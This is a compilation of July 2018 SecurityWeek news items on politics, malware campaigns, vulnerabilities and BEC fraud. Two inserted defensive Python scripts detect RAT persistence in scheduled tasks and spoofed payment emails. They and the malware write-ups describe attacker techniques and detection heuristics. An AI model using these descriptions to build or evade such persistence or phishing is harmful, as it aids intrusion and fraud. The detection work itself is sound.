Back in Washington, Trump Under Pressure to Reverse Course on Russia
19.7.2018 securityweek BigBrothers
President Donald Trump found himself isolated and under pressure to reverse course Tuesday after publicly challenging the US intelligence conclusion that Russia meddled in the 2016 election during his face-to-face with Vladimir Putin.
At his inaugural summit with the Russian president in Finland, Trump appeared to accept at face value the strongman's denial that Moscow interfered in a bid to undermine the Democrat Hillary Clinton -- a stance that triggered bipartisan outrage at home.
Back in Washington, Trump sounded a defensive note, insisting his meeting with Putin had been "even better" than his one last week with traditional allies NATO -- a testy gathering seen as having badly strained trans-Atlantic ties.
But the US president -- who is expected to speak about the meeting at 2:00 pm (1800 GMT) on Tuesday -- has found precious little support for his decision not to confront Putin, and faced calls even from allies to change tack.
"He has to reverse course immediately and he's gotta get out there as soon as possible before the concrete starts to set on this," former White House communications director Anthony Scaramucci said on CNN.
"Loyalty right now requires you to tell the truth and sit with him and explain to him the optics of the situation, why the optics are bad, the strategy in terms of trying to get along with Vladimir Putin and deploying a strategy of going against the intelligence agency is very bad," Scaramucci said.
Former House speaker and longtime Trump ally Newt Gingrich put it yet more bluntly.
"President Trump must clarify his statements in Helsinki on our intelligence system and Putin," he tweeted as Trump headed home. "It is the most serious mistake of his presidency and must be corrected -- immediately."
Trump's performance at the summit has even come under fire from the hosts at Fox News, usually a reliable defender of the president.
"No negotiation is worth throwing your own people and country under the bus," Fox anchor and Fox & Friends co-host Abby Huntsman -- the daughter of the US ambassador to Russia -- wrote on Twitter.
And former president Barack Obama, who has remained above the political fray since leaving office, appeared to allude to the events of the day before during a rare public appearance Tuesday at which he warned the world had plunged into "strange and uncertain times."
"Strongman politics are ascendant, suddenly, whereby elections and some pretense of democracy are maintained -- the form of it -- but those in power seek to undermine every institution or norm that gives democracy meaning," Obama said in Johannesburg.
- 'Undermine democracy' -
Trump and Putin met for two hours in Helsinki on Monday with only their interpreters present, then held a joint press conference.
Standing alongside the Kremlin boss, Trump acknowledged that his intelligence chiefs believe Russia hacked and leaked Democrats' emails containing politically damaging information about his rival Clinton in 2016.
But, insisting he had won the race fair and square, the Republican said: "I have President Putin, he just said it is not Russia. I will say this: I don't see any reason why it would be."
Special Counsel Robert Mueller's investigation into Russian meddling and possible collusion with the Trump campaign has increasingly put pressure on the White House, and the president -- who regards it as an attack on his legitimacy -- has dubbed it a "witch hunt."
But the investigation continues to progress, resulting in the indictment of 12 Russian military intelligence agents on Friday -- timing that was embarrassing in light of the upcoming summit.
While Trump has faced intense criticism over Helsinki, he is not entirely without defenders.
Republican Senator Rand Paul has given a series of interviews supporting Trump's stance towards Putin, and berating his critics as biased.
"I think the president did a good thing by meeting with Putin and I think it's a mistake for people to try to turn this into a partisan escapade," the Kentucky Republican said on CBS.
Paul's efforts drew praise from Trump, who tweeted: "Thank you @RandPaul, you really get it!"
But the bipartisan consensus has been broadly hostile to Trump's stance -- as the top Republican in Congress, House Speaker Paul Ryan made clear once more at a press conference Tuesday on Capitol Hill.
"We stand by our NATO allies and all those countries who are facing Russian aggression," Ryan said. "Vladimir Putin does not share our interests, Vladimir Putin does not share our values."
"We just conducted a yearlong investigation into Russia's interference in our elections. They did interfere in our elections. It's really clear. There should be no doubt about that," he said.
"Russia is trying to undermine democracy itself."
RATs Bite Ukraine in Ongoing Espionage Campaign
19.7.2018 securityweek Virus
An ongoing espionage campaign aimed at Ukraine is leveraging three different remote access Trojans (RATs), ESET security researchers warn.
The attacks apparently started in late 2015, but the first report on them emerged in January 2018. ESET says it has been tracking the campaign since mid-2017, and that the attacks have been focused mainly on Ukrainian government institutions, with a few hundred victims across different organizations.
The actors behind this cyber-espionage campaign have been using multiple stealthy RATs to exfiltrate sensitive documents, namely Quasar RAT, Sobaken RAT, and a custom-made RAT called Vermin.
The attackers, who appear to lack advanced skills and access to zero-day vulnerabilities, are using emails and social engineering to distribute the malware. Some emails carried Word documents attempting to exploit CVE-2017-0199, a vulnerability patched in April 2017.
A dropper is usually used to deliver the final payload (which masquerades as software from Adobe, Intel or Microsoft) to the %APPDATA% folder and to achieve persistence via a scheduled task that executes the malware every 10 minutes. Steganography was also employed to evade content filtering, according to a whitepaper (PDF) published by ESET.
To avoid automated analysis systems and sandboxes, the malware checks whether the Russian or Ukrainian keyboard layouts are installed and terminates itself if neither is found. It also checks the system’s IP address and the username on the machine. Moreover, it checks that a connection to a randomly generated website name/URL fails, as would be expected on a real system rather than in a sandbox that resolves every domain.
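The persistence pattern described above (a payload under %APPDATA% named after Adobe, Intel or Microsoft, re-launched by a scheduled task every 10 minutes) is something a defender can hunt for in a scheduled-task inventory. The script below is an added example written for this page, not ESET's tooling or anything from the whitepaper: it parses a verbose scheduled-task export and flags tasks that combine a user-writable launch path with a short repeat interval or a vendor-lookalike name. The column names and the wording of the "Repeat: Every" field are assumed to follow the verbose CSV layout of `schtasks /query /fo CSV /v`; adjust them to your own export. The sample rows are constructed.

```python
import csv
import io
import re

# Constructed sample of a verbose scheduled-task export. The column subset and the
# "0 Hour(s), 10 Minute(s)" wording are assumptions about the schtasks CSV layout.
SAMPLE_CSV = r'''
"HostName","TaskName","Task To Run","Schedule Type","Repeat: Every","Run As User"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -k -g","Weekly","N/A","SYSTEM"
"WS01","\AdobeUpdater","C:\Users\alice\AppData\Roaming\Adobe\AdobeUpdater.exe","One Time Only","0 Hour(s), 10 Minute(s)","WS01\alice"
"WS01","\IntelGfx","C:\Users\alice\AppData\Roaming\Intel\igfx.exe","One Time Only","0 Hour(s), 05 Minute(s)","WS01\alice"
"WS01","\NightlyBackup","C:\Program Files\Backup\backup.exe --full","Daily","N/A","SYSTEM"
'''.strip()

# Launch paths an unprivileged user can write to (profile directories or the
# environment variables that expand to them).
USER_WRITABLE = re.compile(
    r"\\(AppData|Local Settings|Temp)\\|%(APPDATA|LOCALAPPDATA|TEMP|TMP)%",
    re.IGNORECASE,
)
# Vendor names the campaign's payloads impersonate.
VENDOR_LOOKALIKE = re.compile(r"\b(adobe|intel|microsoft)\b", re.IGNORECASE)
REPEAT_RE = re.compile(r"(\d+) Hour\(s\), (\d+) Minute\(s\)")


def parse_interval_minutes(text):
    """Turn a 'Repeat: Every' value into minutes; None when the task does not repeat."""
    m = REPEAT_RE.search(text or "")
    if not m:
        return None
    return int(m.group(1)) * 60 + int(m.group(2))


def suspicious_tasks(csv_text, max_interval_minutes=15):
    """Return tasks that show at least two of the persistence traits described above."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        cmd = row.get("Task To Run", "")
        reasons = []
        from_user_path = bool(USER_WRITABLE.search(cmd))
        if from_user_path:
            reasons.append("executable lives in a user-writable profile directory")
        interval = parse_interval_minutes(row.get("Repeat: Every"))
        if interval is not None and interval <= max_interval_minutes:
            reasons.append(f"repeats every {interval} minute(s)")
        if from_user_path and VENDOR_LOOKALIKE.search(cmd):
            reasons.append("vendor-lookalike name outside a vendor install directory")
        # A single trait is common in legitimate software; require two to cut noise.
        if len(reasons) >= 2:
            findings.append({
                "task": row["TaskName"],
                "command": cmd,
                "user": row.get("Run As User", ""),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in suspicious_tasks(SAMPLE_CSV):
        print(f"{f['task']} ({f['user']}): {f['command']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Requiring two traits keeps ordinary updaters (which often do live under the user profile but repeat hourly or daily) out of the results; lower `max_interval_minutes` or add your own path patterns to tune it for a fleet.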
An open-source backdoor, Quasar RAT can be freely downloaded from GitHub and has been employed by the actors behind this campaign since at least October 2015. Other groups have been using the malware in their attacks as well, including the Gaza Cybergang, which is also known as Gaza Hackers Team and Molerats.
Sobaken is a heavily modified version of Quasar RAT, with removed functionality to make the executable smaller, but also with several anti-sandbox and other evasion tricks added.
Vermin RAT, on the other hand, is a custom-made backdoor that first emerged in mid-2016 and which continues to be used. Written in .NET, it is protected using ConfuserEx and uses Vitevic Assembly Embedder, free software for embedding required DLLs into the main executable.
The malware supports screen capture, directory listing, file upload/download/deletion/renaming, process monitoring and termination, shell command execution, keylogging, folder manipulation, audio capture, and bot updates.
Most of the commands are implemented in the main payload, but the RAT also includes support for optional components, such as audio recorder, keylogger, password stealer, and USB file stealer.
“These attackers haven’t received much public attention compared to others who target high-profile organizations in Ukraine. However, they have proved that with clever social engineering tricks, cyber-espionage attacks can succeed even without using sophisticated malware. This underscores the need for training staff in cybersecurity awareness, on top of having a quality security solution in place,” ESET notes.
Siemens Informs Customers of New Meltdown, Spectre Variants
19.7.2018 securityweek Vulnerability
Siemens recently updated its security bulletin for the Meltdown and Spectre vulnerabilities to inform customers of the latest variants, specifically the ones known as LazyFP and Spectre 1.1.
Several industrial control systems (ICS) vendors published security advisories for the CPU flaws shortly after they were disclosed in early January. Siemens published a bulletin on speculative side-channel vulnerabilities on January 11.
In late May, the company updated its bulletin to include information about Variant 3a and Variant 4, which are also known as Spectre-NG. On Tuesday, Siemens once again updated the security bulletin to describe the variants known as LazyFP, a medium severity Meltdown-like flaw disclosed in mid-June and tracked as CVE-2018-3665, and Spectre 1.1, disclosed earlier this month and tracked as CVE-2017-5753.
LazyFP is related to the floating point unit (FPU), also known as the math coprocessor. Researchers discovered that if certain conditions are met an attacker may be able to access FPU state data, which can contain sensitive information, such as cryptographic keys.
Spectre 1.1, described as a bounds check bypass store (BCBS) issue, was disclosed along with Spectre 1.2. Intel awarded $100,000 to the researchers who identified these variants.
While LazyFP and Spectre 1.1 are related to the original Meltdown and Spectre vulnerabilities, CPU and operating system vendors are not as concerned about their impact.
Siemens has advised customers to keep an eye out for software and firmware updates provided for operating systems and processors, but warned that some of these updates “can result in compatibility, performance or stability issues.”
The German industrial giant continues to analyze the impact of these vulnerabilities on its products.
In the case of the original Meltdown and Spectre flaws, they have been found to impact many Siemens products, including SIMATIC, RUGGEDCOM, SIMOTION, SINEMA and SINUMERIK devices. The company has released both software and BIOS updates, along with workarounds and mitigations.
Microsoft Offers $100,000 in New Identity Bug Bounty Program
19.7.2018 securityweek Security
Microsoft on Tuesday announced the launch of a new bug bounty program that offers researchers the opportunity to earn up to $100,000 for discovering serious vulnerabilities in the company’s various identity services.
White hat hackers can earn a monetary reward ranging between $500 and $100,000 if they find flaws that impact Microsoft Identity services, flaws that can be leveraged to hijack Microsoft and Azure Active Directory accounts, vulnerabilities affecting the OpenID or OAuth 2.0 standards, or weaknesses that affect the Microsoft Authenticator applications for iOS and Android.
The list of domains covered by the new bug bounty program includes login.windows.net, login.microsoftonline.com, login.live.com, account.live.com, account.windowsazure.com, account.activedirectory.windowsazure.com, credential.activedirectory.windowsazure.com, portal.office.com and passwordreset.microsoftonline.com.
The top reward can be earned for a high quality submission describing ways to bypass multi-factor authentication, or design vulnerabilities in the authentication standards used by Microsoft. OpenID and OAuth implementation flaws can earn hackers up to $75,000.
The smallest rewards are offered for XSS (up to $10,000), authorization issues ($8,000), and sensitive data exposure ($5,000).
“A high-quality report provides the information necessary for an engineer to quickly reproduce, understand, and fix the issue. This typically includes a concise write up containing any required background information, a description of the bug, and a proof of concept. We recognize that some issues are extremely difficult to reproduce and understand, and this will be considered when adjudicating the quality of a submission,” Microsoft wrote on a page dedicated to its new bug bounty program.
The tech giant currently runs several bug bounty programs that offer hundreds of thousands of dollars for a single vulnerability report. This includes the speculative execution side-channel program, which offers up to $250,000 and which the company launched following the disclosure of Meltdown and Spectre; the Hyper-V program, which also offers up to $250,000; the mitigation bypass bounty, with rewards of up to $100,000 for novel exploitation techniques against Windows protections; and the Bounty for Defense, which offers an additional $100,000 for defenses to the mitigation bypass techniques.
GandCrab: The New King of Ransomware?
19.7.2018 securityweek Ransomware
Cryptominers have plateaued, GandCrab is the new king of ransomware, adware -- surprise! -- is as prolific as ever, and VPNFilter might herald a new genre of sophisticated multi-purpose malware. These are some of the conclusions drawn from the Malwarebytes Cybercrime tactics and techniques report for Q2, 2018.
The details come from an analysis (PDF) of the telemetry obtained from the millions of computers using Malwarebytes software. It confirms what has been seen elsewhere: "Ransomware detections dropped this quarter on both the consumer and business sides by 12 and 35 percent, respectively."
This doesn't mean that ransomware has gone away. GandCrab has been the most prolific, partly down to its use by the Magnitude botnet. A decryptor for GandCrab is available on the NoMoreRansom website; but Malwarebytes warns, "there's always a risk that the latest versions being distributed by various exploit kits have no solution in place."
Other new ransomware families highlighted in the report sit at opposite ends of the sophistication spectrum. Spartacus is simple. Although there is no current decryptor, the report suggests, "Spartacus is the kind of software one expects to find offered on a script kiddie forum. There's no online functionality whatsoever." It adds that it seems likely (because the RSA key is embedded in the ransomware) that the private key is held on the author's server. "Decryption for all victims is possible, should this key ever be leaked."
SamSam resides at the sophisticated end of the spectrum. It has had high profile success at the City of Atlanta and Hancock Health this year. "While SamSam has been around for some time, recent evolutions in the attack vector and methodology have proven novel in their approach and successful for the attackers -- raking in over $1 million this year," comments Malwarebytes. Unlike many other ransomwares, SamSam specifically targets and compromises its victims before encrypting the files.
Many commentators have noted that criminal focus has shifted from ransomware to cryptomining in recent months. Malwarebytes telemetry suggests that cryptomining growth has now flattened. It is already declining in the consumer arena, and the firm expects to see it also decline in business attacks next quarter. It suspects that criminals are not receiving the returns on effort they expected; but warns that growth or decline might depend on whether the value of crypto coins goes up or down. Business detections in Q2 grew by just 5%, while consumer detections fell by 36%.
Adware, always near the top of all malware detections, is on the opposite trajectory. Consumer detections grew by 19% (making it the top consumer threat), while business detections fell by 7% (making it the third most prolific threat).
The fastest growing threat for both consumers and businesses has been the return of the backdoor -- growing by 442% up to number three for consumers, and by 109% up to number four for businesses. Malwarebytes attributes much of this growth to a malware spreading campaign it refers to as Backdoor.Vools. Since it uses worm features that exploit vulnerable SMB implementations, Malwarebytes expects it to hang around for months to come.
However, it warns, "The primary fear of Vools' capabilities is not due to its mining component or even its use of ETERNALBLUE, but the additional threats that this malware can and will install on the system once cryptomining goes out of fashion. Based on plummeting cryptocurrency values over the last few months, that time is going to come sooner than later."
While backdoors became more popular, spyware dropped in popularity -- at least in business detections. In consumer detections it grew by 32%; but in business detections it fell 41%, dropping from the most detected malware to the fifth most detected. "The top spyware for Q2," notes the report, "was the notorious TrickBot, which added functionality to steal cryptocurrency wallets from its victims." However, Malwarebytes suspects that the fall will continue, and spyware may not be in the top ten threats for business in Q3.
The report reserves particular attention for VPNFilter, "malware that reportedly infected over 500,000 small-office and consumer-grade routers and NAS devices." The FBI has said that Russian government-linked Fancy Bear (APT 28) is responsible for the malware; and although the initial infection vector is unknown, an understanding of its capabilities is growing. It is multi-stage malware that eventually has wide-ranging functionality. Stage 2 can download files, restart devices, copy data, execute programs, kill processes, and set proxies and other configuration parameters.
Stage 3, downloaded by stage 2, establishes a Tor client to send stolen data back to the authors. The malware, notes the report, "is not only capable of harvesting usernames and passwords, but can also change webpages and insert artificial data to deceive users while, at the same time, draining accounts in the shadows. VPNFilter could also be used to perform DDoS attacks or as a catalyst to install other software like coin miners."
Malwarebytes believes that the end of Q2 2018 and the beginning of Q3 is "the cusp of another significant change in the cybercrime world." It believes that cryptomining will continue to decline, but that ransomware will stage a comeback. It expects more activity from exploit kits, but they will not regain their earlier importance. It does, however, expect data-stealing threats to increase. Since GDPR will limit the time for companies to retain the personal information of their customers, criminals will resort to stealing it directly from the customer.
But perhaps most importantly Malwarebytes believes that VPNFilter might spawn copycats that will target widely-used devices -- and "a new age of IoT malware, long predicted, may finally come to pass."
Santa Clara, Silicon Valley-based Malwarebytes raised $50 million in a Series B funding round from Fidelity Management and Research Company in January 2016, bringing the total raised by the firm to $80 million.
Oracle Patches Record 334 Vulnerabilities in July 2018
19.7.2018 securityweek Vulnerability
Oracle Patches Over 200 Remotely Exploitable Vulnerabilities in July 2018 Critical Patch Update
Oracle this week released its July 2018 set of patches to address a total of 334 security vulnerabilities, the largest number of flaws resolved with a Critical Patch Update (CPU) to date. Over 200 of the bugs may be remotely exploitable without authentication.
This month, 23 products from the enterprise security giant were patched, including E-Business Suite, Financial Services Applications, Fusion Middleware, Hospitality Applications, Java SE, MySQL, PeopleSoft Products, Retail Applications, Siebel CRM, and the Sun Systems Products Suite.
More than 50 of the flaws addressed this month had a CVSS 3.0 Base Score of 9.8. Overall, 61 security bugs had a CVSS score of 9.0 or above, according to Oracle’s advisory.
A total of 203 vulnerabilities were patched in business-critical applications, around 65% of which could be exploited remotely without entering credentials, ERPScan, a company that specializes in securing Oracle and SAP applications, points out.
This month, Financial Services Applications received the largest number of fixes, at 56. 21 of these vulnerabilities may be remotely exploitable without authentication.
Fusion Middleware received the second largest number of patches, at 44, with 38 of the addressed issues remotely exploitable without authentication.
Next in line are Retail Applications at 31 fixes (26 flaws being remotely exploitable) and MySQL, also with 31 patches (only 7 bugs remotely exploitable), followed by Hospitality Applications with 24 fixes (7 issues remotely exploitable), Sun Systems Products Suite at 22 patches (10 flaws remotely exploitable), and Enterprise Manager Products Suite with 16 fixes (all remotely exploitable without authentication).
Oracle also addressed vulnerabilities in PeopleSoft Products (15 bugs – 11 remotely exploitable without authentication), E-Business Suite (14 flaws – 13 remotely exploitable), Communications Applications (14 – 10), Virtualization (12 – 2), Construction and Engineering Suite (11 – 6), JD Edwards Products (10 – 9), Java SE (8 – 8), and Supply Chain Products Suite (8 – 6).
“On the surface, the downward trend of Java SE patches would appear to be positive,” Apostolos Giannakidis, Security Architect at Waratek, told SecurityWeek. “However, several actions taken to fix Java SE vulnerabilities in the July CPU are likely to break the functionality of certain applications. Application owners who apply binary patches should be extremely cautious and thoroughly test their applications before putting patches into production.”
"The fix for the most critical Java SE vulnerability in the July CPU - CVE-2018-2938 - removes the vulnerable component (Java DB) from the JDK," Waratek explained in a guidance note sent to SecurityWeek Wednesday. "Users that depend on this component must manually obtain the latest Apache Derby artifacts and rebuild their applications."
The least impacted products include Utilities Applications (4 vulnerabilities – 3 remotely exploitable without authentication), Policy Automation (3 flaws – all remotely exploitable), and Database Server (3 – 1).
All of the vulnerabilities impacting Hyperion (2 bugs), Insurance Applications (2), Global Lifecycle Management (1), iLearning (1), Siebel CRM (1), and Support Tools (1) may be exploited remotely without authentication.
Some of the most important issues addressed this month could be exploited remotely to take over the impacted application: CVE-2017-15095 in Oracle Spatial, CVE-2018-7489 in Global Lifecycle Management OPatchAuto component, CVE-2018-2943 in Fusion Middleware MapViewer, CVE-2018-2894 in WebLogic Server, and CVE-2017-5645 in PeopleSoft Enterprise FIN Install.
In late June, Oracle announced the availability of patches for new variants of the speculative execution attack methods known as Meltdown and Spectre. The company released the first set of mitigations against Spectre and Meltdown as part of the January 2018 CPU.
All Oracle customers are advised to apply the fixes included in Oracle’s Critical Patch Updates without delay, as some of the addressed vulnerabilities are being targeted by malicious actors in live attacks.
“Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches,” the company notes.
Flashpoint Launches Ransomware Response & Readiness Service
19.7.2018 securityweek Ransomware
Threat intelligence and research company Flashpoint on Wednesday announced the launch of a new service designed to help organizations prepare for and respond to ransomware and other types of cyber extortion incidents.
The new Threat Response & Readiness Subscription is available immediately, both as an extension to Flashpoint’s other business risk intelligence offerings and as a standalone service that can be purchased separately. Pricing is customized based on the customer’s requirements for response and readiness engagements.
The readiness part of the service includes ransomware workshops, tabletop exercises (TTX), and pre-negotiated rates and engagement hours. The workshops are designed to educate the customer’s employees on ransomware, including how it works, how organizations can become infected, attacker profiles, and cryptocurrencies.
The TTX involves discussing simulated scenarios, assessing the effectiveness of current response plans, establishing roles and responsibilities, and improving coordination.
As for incident response, Flashpoint provides research on the threat actor launching the attack, engages with the attacker in an effort to determine appropriate mitigations, and even helps the victim acquire cryptocurrency in case they decide to pay the ransom.
“While law enforcement and the security community generally do not recommend that victims pay ransoms or extortion demands, in some cases it is the most reasonable decision, particularly for organizations concerned with the consequences of impermissible downtime and the inaccessibility of critical systems or data,” Tom Hofmann, VP of Threat intelligence at Flashpoint, told SecurityWeek.
“Determining whether or not to pay a ransom or extortion demand is a highly individual and situational decision. Deciding factors generally include available evidence, information, estimated impact, and perhaps most importantly, the estimated validity of the attacker’s claims—in other words, if a payment is made, will the attacker actually unlock or deliver the data?” Hofmann added.
As part of the response service, Flashpoint directly engages with the attacker on behalf of the customer to verify if the threat is real and if the hackers’ claims are credible, determine if the compromised data may be recovered by other means, identify mitigations, and, if necessary, pay the ransom.
Analyzing the threat also involves investigating the digital wallet accepting the ransom or extortion payment, which can provide insight into the validity of the attacker’s claims.
“In some cases, suspected attackers are actually just automated bots attempting to scam victims into paying and have no intention of encrypting or otherwise compromising the victim’s data. If analysis reveals that a unique wallet has not been configured for each unique infection, it is an indicator that the attacker may be less sophisticated, an automated bot could potentially be involved, and further analysis is likely required,” Hofmann explained.
Flashpoint strongly discourages any individual or organization from engaging directly with the threat actor on their own, due to “the inherent difficulties and security risks involved,” Hofmann said.
Data Privacy Automation Provider Integris Software Raises $10 Million
19.7.2018 securityweek IT
Integris Software, a Seattle-based provider of data privacy automation tools, today announced that it has raised $10 million through a Series A financing round led by Aspect Ventures.
The oversubscribed round brings the total funding raised by the company to $13 million.
The company explains that its flagship data privacy automation platform automates the process of “identifying, classifying and continuously monitoring sensitive data that enables a defensible compliance strategy for enterprises.”
"Global CTOs are realizing that complying with privacy law is essentially a data problem and that without an automated discovery mechanism for sensitive information, they’re flying blind on what data is important to secure and why,” Kristina Bergman, CEO of Integris Software, said in a statement.
The company will help customers comply with emerging and changing data privacy regulations, such as the EU’s General Data Protection Regulation (GDPR) and the upcoming California state law AB375.
Other investors participating in the funding round include Workday Ventures, Madrona Venture Group, and Amplify Partners.
“Integris is a unique vendor that, through automation, can discover data at rest or in motion, structured or unstructured, on premise or in the cloud,” said Mark Peek, managing director and co-head, Workday Ventures. “Companies need to be able to produce evidence that shows what sensitive information has been deleted or rectified.”
NIST to Withdraw 11 Outdated Cybersecurity Publications
19.7.2018 securityweek BigBrothers
The U.S. National Institute of Standards and Technology (NIST) announced on Tuesday that its Computer Security Division has decided to withdraw eleven outdated SP 800 publications.
NIST’s 800 series Special Publications (SP) focus on cybersecurity and include guidelines, technical specifications, recommendations, and annual reports. These publications are meant to address and support the security and privacy needs of government agencies, but they are often used and referenced by private sector companies.
NIST’s website currently lists over 180 SP 800 publications, including drafts and final versions. Eleven of them, which are now considered out of date, will be withdrawn on August 1, 2018, and will not be revised or superseded.
The documents will still be available for historical reference, but their status will be changed from “final” to “withdrawn.”
The following SP 800 publications will be withdrawn, with the reason for withdrawal listed for each document:
● SP 800-13 (October 1995): Telecommunications Security Guidelines for Telecommunications Management Network – describes outdated technologies;
● SP 800-17 (February 1998): Modes of Operation Validation System (MOVS): Requirements and Procedures – validation system is for deprecated algorithms, such as DES and Skipjack;
● SP 800-19 (October 1999): Mobile Agent Security – environments and technologies far less complex than what is used today;
● SP 800-23 (August 2000): Guidelines to Federal Organizations on Security Assurance and Acquisition/Use of Tested/Evaluated Products – based on outdated laws, regulations and executive directives;
● SP 800-24 (April 2001): PBX Vulnerability Analysis: Finding Holes in Your PBX Before Someone Else Does – does not address newer technologies, such as VOIP;
● SP 800-33 (December 2001): Underlying Technical Models for Information Technology Security – describes a model that pre-dates the Risk Management Framework and Cybersecurity Framework;
● SP 800-36 (October 2003): Guide to Selecting Information Technology Security Products – outdated references and it does not reflect current types of security products;
● SP 800-43 (November 2002): Systems Administration Guidance for Securing Windows 2000 Professional System – Windows 2000 no longer supported;
● SP 800-65 (January 2005): Integrating IT Security into the Capital Planning and Investment Control Process – pre-dates the Cybersecurity Framework and other important SP 800 guidance;
● SP 800-68 Rev. 1 (October 2008): Guide to Securing Microsoft Windows XP Systems for IT Professionals: A NIST Security Configuration Checklist – Windows XP no longer supported;
● SP 800-69 (September 2006): Guidance for Securing Microsoft Windows XP Home Edition: A NIST Security Configuration Checklist – Windows XP no longer supported.
US Lifts Export Ban on Suppliers to China's ZTE
18.7.2018 securityweek BigBrothers
The United States on Friday formally lifted a crippling ban on exports to China's ZTE, rescuing the smartphone maker from the brink of collapse after it was denied key components.
The US Commerce Department said it would continue to monitor the company to prevent further violations of US sanctions on Iran and North Korea.
"While we lifted the ban on ZTE, the Department will remain vigilant as we closely monitor ZTE's actions to ensure compliance with all US laws and regulations," Commerce Secretary Wilbur Ross said in a statement.
But the move to reverse the harsh penalties, made at President Donald Trump's insistence, has left US lawmakers irate. Congress has taken steps to keep the ban in place and accused Trump of rewarding a company which had repeatedly flouted American law, lied to authorities and engaged in espionage.
The about-face to rescue the company created a stark contrast with the escalating trade war between Washington and Beijing.
The Commerce Department in April banned US companies from supplying ZTE with crucial components, forcing it to halt operations, after officials found further violations even after reaching a settlement in March of last year over the initial complaints.
The company had paid bonuses rather than reprimanding employees involved in illegal activity and created an "elaborate scheme" to deceive US officials and obstruct justice, US officials said.
But as a favor to Chinese President Xi Jinping, Trump ordered Commerce to ease the penalties on ZTE.
In an agreement struck last month, Washington agreed to lift the export ban if ZTE paid an additional $1 billion fine -- beyond the $892 million penalty imposed in 2017.
The company also was required to replace its board of directors, retain outside monitors and put $400 million in escrow to cover any future violations -- a final step it took this week.
In a statement this week, Senator Mark Warner of Virginia, the senior Democrat on the Select Committee on Intelligence, lambasted the reversal, saying the US military and spy agencies had branded ZTE an "ongoing threat" to US national security.
"This sweetheart deal not only ignores these serious issues, it lets ZTE off the hook for evading sanctions against Iran and North Korea with a slap on the wrist," Warner said.
BEC Scam Losses Top $12 Billion: FBI
18.7.2018 securityweek BigBrothers
The losses and potential losses reported as a result of business email compromise (BEC) and email account compromise (EAC) scams exceed $12 billion globally, according to an alert published last week by the FBI.
The report is based on data collected by the FBI’s Internet Crime Complaint Center (IC3), international law enforcement and financial institutions between October 2013 and May 2018. The amounts represent both money that was actually lost by victims and money they could have lost had they taken the bait.
BEC scams, which involve sending requests for fund transfers and personally identifiable information from hijacked business email accounts, have been observed in 50 U.S. states and 150 countries, with money being sent to 115 countries.
The top destinations for money generated by BEC scams are Asian banks in China and Hong Kong, but a significant number of schemes involve financial organizations in the U.K., Mexico and Turkey.
According to the FBI, more than 78,000 complaints have been made globally between October 2013 and May 2018, with over 41,000 victims reported in the United States. Targeted individuals and businesses lost or could have lost $12.5 billion, nearly $3 billion of it in the U.S. Losses increased by 136% between December 2016 and May 2018.
The number of non-U.S. victims known to the FBI is 2,565, with losses totaling over $670 million.
In comparison, the FBI’s previous report on BEC scams, which covered the period between October 2013 and December 2016, said there had been 40,203 incidents globally with exposed losses totaling over $5.3 billion.
In its recent 2017 Internet Crime Report, the FBI said IC3 received over 15,000 BEC and EAC complaints last year, reporting losses of $675 million.
The law enforcement agency highlighted that the real estate sector continues to be increasingly targeted. Victims include law firms, title companies, real estate agents, sellers, and buyers.
In scams targeting this sector, the fraudsters use spoofed emails on behalf of real estate transaction participants and instruct recipients to transfer money into fraudulent accounts.
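The header-level tells of such a spoofed transaction email can be checked mechanically before anyone acts on it. The following is an added example, not code from the article or the FBI alert: it parses a constructed message and reports the BEC indicators it finds (Reply-To pointing off-domain, an executive's display name on a foreign address, a lookalike sender domain, and wire-transfer urgency wording). The executive roster, the trusted domain and both sample messages are constructed for the demo.

```python
"""Heuristic BEC indicators for an inbound message.

Added example, not part of the SecurityWeek article or the FBI alert.
The executive roster, trusted domain and the sample messages are constructed.
"""
from email import message_from_string
from email.utils import parseaddr

# Constructed: people whose names fraudsters impersonate, with their real domain.
EXECUTIVES = {"jane doe": "example-title.com"}

# Constructed: wording that typically accompanies wire-transfer pressure.
URGENCY_TERMS = ("wire", "transfer", "urgent", "new account", "routing")


def domain_of(addr):
    """Lowercase domain of an address like 'Name <user@host>' ('' if malformed)."""
    _, address = parseaddr(addr)
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def edit_distance(a, b):
    """Levenshtein distance; used to catch one- or two-character lookalike domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def bec_indicators(raw_message, trusted_domains):
    """Return the names of the indicators found (empty list means nothing flagged)."""
    msg = message_from_string(raw_message)
    found = []
    from_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = domain_of(from_addr)
    reply_domain = domain_of(msg.get("Reply-To", ""))

    # 1. Replies are redirected to a domain other than the apparent sender's.
    if reply_domain and reply_domain != from_domain:
        found.append("reply-to-mismatch")

    # 2. Display name is a known executive but the address is not on their domain.
    legit_domain = EXECUTIVES.get(from_name.strip().lower())
    if legit_domain and from_domain != legit_domain:
        found.append("display-name-spoof")

    # 3. Sender domain is a near-miss of a domain the recipient trusts.
    for trusted in trusted_domains:
        if from_domain != trusted and 0 < edit_distance(from_domain, trusted) <= 2:
            found.append("lookalike-domain")
            break

    # 4. Body pushes a payment change with urgency wording (two or more terms).
    body = msg.get_payload() if not msg.is_multipart() else ""
    if sum(term in body.lower() for term in URGENCY_TERMS) >= 2:
        found.append("urgency-wording")
    return found


# Constructed sample: the "updated wiring instructions" closing-scam message.
SAMPLE_SPOOFED = """\
From: Jane Doe <jane.doe@exarnple-title.com>
Reply-To: closing-desk@mail-relay.example
To: buyer@example.net
Subject: Updated wiring instructions for closing

Please wire the closing funds today to the new account below; routing
details are attached. This is urgent, the seller will not wait.
"""

# Constructed benign message from the genuine domain.
SAMPLE_LEGIT = """\
From: Jane Doe <jane.doe@example-title.com>
To: buyer@example.net
Subject: Closing checklist

Here is the checklist for Friday. Call our published number with questions.
"""

TRUSTED = {"example-title.com"}

if __name__ == "__main__":
    print(bec_indicators(SAMPLE_SPOOFED, TRUSTED))  # four indicators
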